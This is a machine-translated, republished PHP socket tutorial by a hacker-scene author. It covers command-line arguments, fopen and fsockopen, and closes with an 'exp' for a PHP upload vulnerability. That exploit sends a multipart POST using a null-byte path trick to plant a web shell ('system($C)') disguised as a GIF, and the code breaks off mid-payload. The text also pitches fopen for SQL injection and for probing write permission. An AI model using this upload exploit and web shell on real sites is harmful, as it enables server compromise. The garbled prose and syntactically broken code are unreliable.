Author: Darkness[bst]
Msn:cqxy[at]21cn.net
Study PHP2 months, harvest quite a lot. But unlike others, I prefer socket.php in sockets. So I decided to write a series of php-socket reading notes. Always write from the most basic to the Socket_raw.
Example + experience. The instance will have port forwarding (breakout firewall), dynamic network type exp, port scan, PHP backdoor, and contract type EXP framework. For the sake of study, I can only write one article per week. I want you to go into PHP shell programming together.
Objective:
PHP is one of the most popular scripting languages in the world. It has been widely used in web programming for a long time. I want to say that PHP is not only good at the web, but also good at the shell side. It's just that people are more accustomed to using Perl to write shell scripts. Here, I am not a master of PHP, contact PHP for a few weeks, this is just a reading notes. Please come forward where there is a mistake. You can also send me mail and discuss PHP together.
Pre-Knowledge:
PHP Most attractive to me is the sockets extension, in fact I will be simple VB Winsock, can use VB to write a commonly used Winsock program out. But I still chose PHP. Because it's cross-platform.
PHP By default does not support advanced sockets, only the "encapsulated" fsockopen, and so on a number of functions. The socket, as an extension of PHP, needs to be set up to support it. You need to set up PHP in Windows. INI, in PHP. INI search; Windows extensions this line, remove; Extension=php_sockets.dll front semicolon. That ' s OK. *nix you need to add the-enable-sockets command at compile time. When you do not use the DL () function, your PHP must be php_sockets.dll in the same directory. OK, complete the PHP socket configuration.
Here's the question of running.
Running PHP scripts under the terminal is simple. Under Windows C:phpphp.exe╟q Test.php,*nix the php file will be executed in advance by PHP, just like Perl. Like #!/usr/local/bin/php╟q, and then A./test.php. The meaning of the parameter q is not to output the PHP header information.
Input parameter question:
Some people say how the PHP shell enters parameters. You can enter parameters like this on the Web
http://xxx.com/aa.php?Parameter 1=xxxx& parameter 2=ssssss. It's okay. php, like Perl, has similar parameter functions. Look at the official description.
"ARGV"
The arguments passed to the script. When the script runs in command-line mode, the ARGV variable is passed to the program's C-language style command-line arguments. When the Get method is called, the variable contains the requested data.
"ARGC"
Contains the number of command-line arguments passed to the program (if run in command-line mode).
Oh, simple to say. Look, let me give you an example.
Here's the code:
<textarea style="WIDTH: 100%" name="textfield" rows="10"><?if ($ARGC! = 4 | | in_array ($ARGC [1], Array (--help,-h,?))) {echo "by Darkness[bst].we'll come back soon!"; echo "------------------------------------------------"; echo "c:/php/php.exe-q uploadexp.php/http www.bugkidz.org/upload.php filepath "; echo"------------------------------------------------";} $host = $argv [1]; $url = $argv [2]; $path = $argv [3];? ></textarea>
[Ctrl + a Select all]
I think you should understand oh, here argc[0] refers to the program itself. can also come.
Print (%s, $argv [1]);
Spend the noon in the Internet bar 1 hours to write down this little paragraph
The preceding paragraph talks about the operation of command-line mode. For more information, please refer
http://www.php.net/manual/zh/features.commandline.php
Application of 1.fopen
Fopen can also be referred to as encapsulated socket functions. Not only for file read and write, but also for sockets. Fopen is equivalent to the inet control/class of other high-level languages, and he is more advanced in the operation of URLs than Fsockopen.
How to use fopen
$s = fopen ($url, mode);
The Mode property of the fopen:
Mode description
R read-only opens, pointing the file pointer to the file header.
r+ read-write mode opens, pointing the file pointer to the file header.
W writes open, points the file pointer to the file header and truncates the file size to zero. If the file does not exist, try to create it.
w+ read-write mode opens, pointing the file pointer to the file header and truncating the file size to zero. If the file does not exist, try to create it.
A write mode opens, pointing the file pointer to the end of the file. If the file does not exist, try to create it.
A + read-write mode opens, pointing the file pointer to the end of the file. If the file does not exist, try to create it.
X creates and opens in writing, pointing the file pointer to the file header. If the file already exists, the fopen () call fails and returns false, and generates an E_warning level error message. If the file does not exist, try to create it. This is equivalent to specifying the O_excl|o_creat token for the underlying open (2) system call. This option is supported by PHP 4.3.2 and later versions and can only be used on local files.
X+ is created and opened as read-write, pointing the file pointer to the file header. If the file already exists, the fopen () call fails and returns false, and generates an E_warning level error message. If the file does not exist, try to create it. This is equivalent to specifying the O_excl|o_creat token for the underlying open (2) system call. This option is supported by PHP 4.3.2 and later versions and can only be used on local files.
This is the operation for local files and can also be used for inet. Isn't it kool?
If you want to test whether the IIS directory of a station has write permission.
Can write like this
$s = fopen ("
http://www.bugkidz.org"," x+ ") or Die (" Write permission not Present ")
If it exists, you can continue to construct the following statement. Write files remotely with fwrite.
But the general Web site is read-only permission
$s =fopen ("
http://www.bugkidz.org/index.php?id=1"," R ");
So I enrolled in the
http://www.bugkidz.org/index.php?id=1Content, but it has to be processed to get the full file content
Such
while (!feof ($s)) {
Echo fgets ($s, 1024);
}
I think fopen is the most convenient for SQL injection.
function Phpinet ($url)
{
fopen ($url, "R") or Die ("Open URL error");
while (!feof ($s)) {
$cahe = fgets ($s, 1024);
}
Retrun $cahe;
Fclose ($s)
}
This function is equivalent to the Inet.openurl in VB
The use of Fsockopen family functions
Fsockopen is also a class of socket functions that are encapsulated. A bit similar to the Winsock control in VB. Unfortunately, it supports active socket connections, does not support bind,listen, etc., and if you need to implement these features, use advanced socket programming in PHP. Even so, the Fsockopen function can meet most requirements.
This uses Fsockopen
Resource Fsockopen (string target, int port [, int errno [, String errstr [, float timeout]])
Example:
$sock = Fsockopen ("192.168.0.1", $errno, $errstr, 30);
The first 2 are the address and the port, the middle 2 is the variable about the error, and finally the timeout setting.
Usually $sock = Fsockopen ("192.168.0.1", 80);
$sock = Fsockopen ("192.168.0.1", 80); This is a typical TCP connection. UDP connections So come
$sock = Fsockopen ("udp://192.168.0.1", 53);
It is also possible to use this to write a TFTP client.
Examples of Fsockopen applications:
Instance one, a simple HTTP session.
Code
Here's the code:
<textarea style="WIDTH: 100%" name="textfield" rows="10"><?php$fp = Fsockopen ("www.example.com", $errno, $errstr), if (! $fp) {echo "$errstr ($errno) <br/>";} E LSE {$out = "get/http/1.1"; $out. = "host:www.example.com"; $out. = "Connection:close"; fwrite ($fp, $out); while (!feof ($FP)) {echo fgets ($fp, 128);} Fclose ($FP);}? ></textarea>
[Ctrl + a Select all]
The process is generally the case
Create a Fsockopen resource, define the sending content, write the definition with the Fwrite function or the fputs function, and the output from one line to the end of the file, until the Fgets function, or fread use, is reached. Use Fclose to close the established Fsockopen resource.
Angel wrote a PHP port scanning tool that posted the
http://www.4ngel.net/article/20.htm
Choosing Fsockopen to write a simple exp send frame is definitely a goodidea. Becoz it so easy.
See the exp of my PHP upload vulnerability.
Code
Here's the code:
<textarea style="WIDTH: 100%" name="textfield" rows="10"><?php#codz by Darkness Msn:cqxy[at]21cn.net$sock = Fsockopen ("www.ririririri.com", +); if (! $sock) {echo "Cannot Connect it! ";} $body = "-----------------------------7d41f4a600472". " Content-disposition:form-data; Name= "Path" ".". " Www.ppp%00 "." -----------------------------7d41f4a600472 "." Content-disposition:form-data; Name= "image"; Filename= "F:\tools\1.gif" "." Content-type:text/plain "." "." <?php "." System ($C); "."? > "." -----------------------</p></textarea>
http://www.bkjia.com/PHPjc/532676.html www.bkjia.com true http://www.bkjia.com/PHPjc/532676.html techarticle Author: darkness[bst] msn:cqxy[at]21cn.net study PHP2 months, harvest quite a lot. But unlike others, I prefer socket.php in the socket this aspect of the article too little. So decided to write a series ...
